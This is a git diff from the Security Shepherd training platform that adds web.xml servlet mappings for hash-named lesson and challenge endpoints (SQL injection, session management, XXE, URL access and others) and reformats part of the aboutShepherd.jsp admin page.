+		<url-pattern>/challenges/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/lessons/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806</servlet-name>
+		<servlet-class>servlets.module.lesson.SessionManagementLesson</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/lessons/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806</servlet-name>
+		<url-pattern>/lessons/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement1</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a</servlet-name>
+		<url-pattern>/challenges/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement2</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7</servlet-name>
+		<url-pattern>/challenges/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/f5ddc0ed2d30e597ebacf5fdd117083674b19bb92ffc3499121b9e6a12c92959</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement2ChangePassword</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/f5ddc0ed2d30e597ebacf5fdd117083674b19bb92ffc3499121b9e6a12c92959</servlet-name>
+		<url-pattern>/challenges/f5ddc0ed2d30e597ebacf5fdd117083674b19bb92ffc3499121b9e6a12c92959</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement3</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3</servlet-name>
+		<url-pattern>/challenges/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/b467dbe3cd61babc0ec599fd0c67e359e6fe04e8cdc618d537808cbb693fee8a</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement3ChangePassword</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/b467dbe3cd61babc0ec599fd0c67e359e6fe04e8cdc618d537808cbb693fee8a</servlet-name>
+		<url-pattern>/challenges/b467dbe3cd61babc0ec599fd0c67e359e6fe04e8cdc618d537808cbb693fee8a</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/lessons/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100</servlet-name>
+		<servlet-class>servlets.module.lesson.DirectObjectLesson</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/lessons/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100</servlet-name>
+		<url-pattern>/lessons/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c</servlet-name>
+		<servlet-class>servlets.module.challenge.DirectObject1</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c</servlet-name>
+		<url-pattern>/challenges/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4</servlet-name>
+		<servlet-class>servlets.module.challenge.DirectObject2</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4</servlet-name>
+		<url-pattern>/challenges/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629</servlet-name>
+		<servlet-class>servlets.module.challenge.SqlInjection4</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629</servlet-name>
+		<url-pattern>/challenges/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62</servlet-name>
+		<servlet-class>servlets.module.challenge.SqlInjection5</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62</servlet-name>
+		<url-pattern>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62CouponCheck</servlet-name>
+		<servlet-class>servlets.module.challenge.SqlInjection5CouponCheck</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62CouponCheck</servlet-name>
+		<url-pattern>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62CouponCheck</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck</servlet-name>
+		<servlet-class>servlets.module.challenge.SqlInjection5VipCheck</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck</servlet-name>
+		<url-pattern>/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2</servlet-name>
+		<servlet-class>servlets.module.challenge.SqlInjection6</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2</servlet-name>
+		<url-pattern>/challenges/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced</servlet-name>
+		<servlet-class>servlets.module.challenge.SqlInjection7</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced</servlet-name>
+		<url-pattern>/challenges/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c992</servlet-name>
+		<servlet-class>servlets.module.challenge.UrlAccess1Admin</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c992</servlet-name>
+		<url-pattern>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c992</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99</servlet-name>
+		<servlet-class>servlets.module.challenge.UrlAccess1</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99</servlet-name>
+		<url-pattern>/challenges/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fahghghmin</servlet-name>
+		<servlet-class>servlets.module.challenge.UrlAccess2Admin</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fahghghmin</servlet-name>
+		<url-pattern>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fahghghmin</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa</servlet-name>
+		<servlet-class>servlets.module.challenge.UrlAccess2</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa</servlet-name>
+		<url-pattern>/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4</servlet-name>
+		<servlet-class>servlets.module.challenge.UrlAccess3</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4</servlet-name>
+		<url-pattern>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4UserList</servlet-name>
+		<servlet-class>servlets.module.challenge.UrlAccess3UserList</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4UserList</servlet-name>
+		<url-pattern>/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4UserList</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1</servlet-name>
+		<servlet-class>servlets.module.challenge.BrokenCrypto3</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1</servlet-name>
+		<url-pattern>/challenges/2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9</servlet-name>
+		<servlet-class>servlets.module.challenge.BrokenCrypto4</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9</servlet-name>
+		<url-pattern>/challenges/b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement4</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6</servlet-name>
+		<url-pattern>/challenges/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement5</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1</servlet-name>
+		<url-pattern>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1SendToken</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement5SetToken</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1SendToken</servlet-name>
+		<url-pattern>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1SendToken</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1ChangePass</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement5ChangePassword</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1ChangePass</servlet-name>
+		<url-pattern>/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1ChangePass</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement6</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece</servlet-name>
+		<url-pattern>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316eceSecretQuestion</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement6SecretQuestion</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316eceSecretQuestion</servlet-name>
+		<url-pattern>/challenges/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316eceSecretQuestion</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement7</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80</servlet-name>
+		<url-pattern>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80SecretQuestion</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement7SecretQuestion</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80SecretQuestion</servlet-name>
+		<url-pattern>/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80SecretQuestion</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334</servlet-name>
+		<servlet-class>servlets.module.challenge.SessionManagement8</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334</servlet-name>
+		<url-pattern>/challenges/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e</servlet-name>
+		<servlet-class>servlets.module.challenge.PoorValidation1</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e</servlet-name>
+		<url-pattern>/challenges/ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5</servlet-name>
+		<servlet-class>servlets.module.challenge.PoorValidation2</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5</servlet-name>
+		<url-pattern>/challenges/20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/lessons/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f</servlet-name>
+		<servlet-class>servlets.module.lesson.PoorValidationLesson</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/lessons/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f</servlet-name>
+		<url-pattern>/lessons/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/lessons/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833</servlet-name>
+		<servlet-class>servlets.module.lesson.SecurityMisconfigLesson</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/lessons/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833</servlet-name>
+		<url-pattern>/lessons/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4</servlet-name>
+		<servlet-class>servlets.module.challenge.SecurityMisconfigStealTokens</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4</servlet-name>
+		<url-pattern>/challenges/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c</servlet-name>
+		<servlet-class>servlets.module.challenge.DirectObjectBankLogin</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c</servlet-name>
+		<url-pattern>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cReg</servlet-name>
+		<servlet-class>servlets.module.challenge.DirectObjectBankRegistration</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cReg</servlet-name>
+		<url-pattern>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cReg</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cCurrentBalance</servlet-name>
+		<servlet-class>servlets.module.challenge.DirectObjectBankCurrentBalance</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cCurrentBalance</servlet-name>
+		<url-pattern>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cCurrentBalance</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cTransfer</servlet-name>
+		<servlet-class>servlets.module.challenge.DirectObjectBankTransfer</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cTransfer</servlet-name>
+		<url-pattern>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cTransfer</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cLogout</servlet-name>
+		<servlet-class>servlets.module.challenge.DirectObjectBankLogout</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cLogout</servlet-name>
+		<url-pattern>/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00cLogout</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66</servlet-name>
+		<servlet-class>servlets.module.challenge.NoSqlInjection1</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66</servlet-name>
+		<url-pattern>/challenges/d63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4</servlet-name>
+		<servlet-class>servlets.module.challenge.SqlInjectionEscaping</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4</servlet-name>
+		<url-pattern>/challenges/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7</servlet-name>
+		<servlet-class>servlets.module.challenge.SqlInjectionStoredProcedure</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7</servlet-name>
+		<url-pattern>/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4</servlet-name>
+		<servlet-class>servlets.module.challenge.BrokenCryptoHomeMade</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4</servlet-name>
+		<url-pattern>/challenges/9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4</url-pattern>
+	</servlet-mapping>
+
+
+	<servlet>
+		<servlet-name>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e</servlet-name>
+		<servlet-class>servlets.module.challenge.XxeChallenge1</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e</servlet-name>
+		<url-pattern>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e</url-pattern>
+	</servlet-mapping>
+	<servlet>
+		<servlet-name>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e0</servlet-name>
+		<servlet-class>servlets.module.lesson.XxeLesson</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e0</servlet-name>
+		<url-pattern>/challenges/ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e0</url-pattern>
+	</servlet-mapping>
+
+
+	<filter>
+		<filter-name>SetupFilter</filter-name>
+		<filter-class>servlets.SetupFilter</filter-class>
+	</filter>
+	<filter-mapping>
+		<filter-name>SetupFilter</filter-name>
+		<url-pattern>/*</url-pattern>
+		<servlet-name>Setup</servlet-name>
+		<dispatcher>REQUEST</dispatcher>
+	</filter-mapping>
 
 </web-app>
diff --git a/src/main/webapp/admin/config/aboutShepherd.jsp b/src/main/webapp/admin/config/aboutShepherd.jsp
index 55570a8d1..ad4e6fb82 100644
--- a/src/main/webapp/admin/config/aboutShepherd.jsp
+++ b/src/main/webapp/admin/config/aboutShepherd.jsp
@@ -1,78 +1,87 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.util.Locale, java.util.ResourceBundle, java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.util.Locale, java.util.ResourceBundle, java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: aboutShepherd.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: aboutShepherd.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(enableFeedback.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(enableFeedback.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
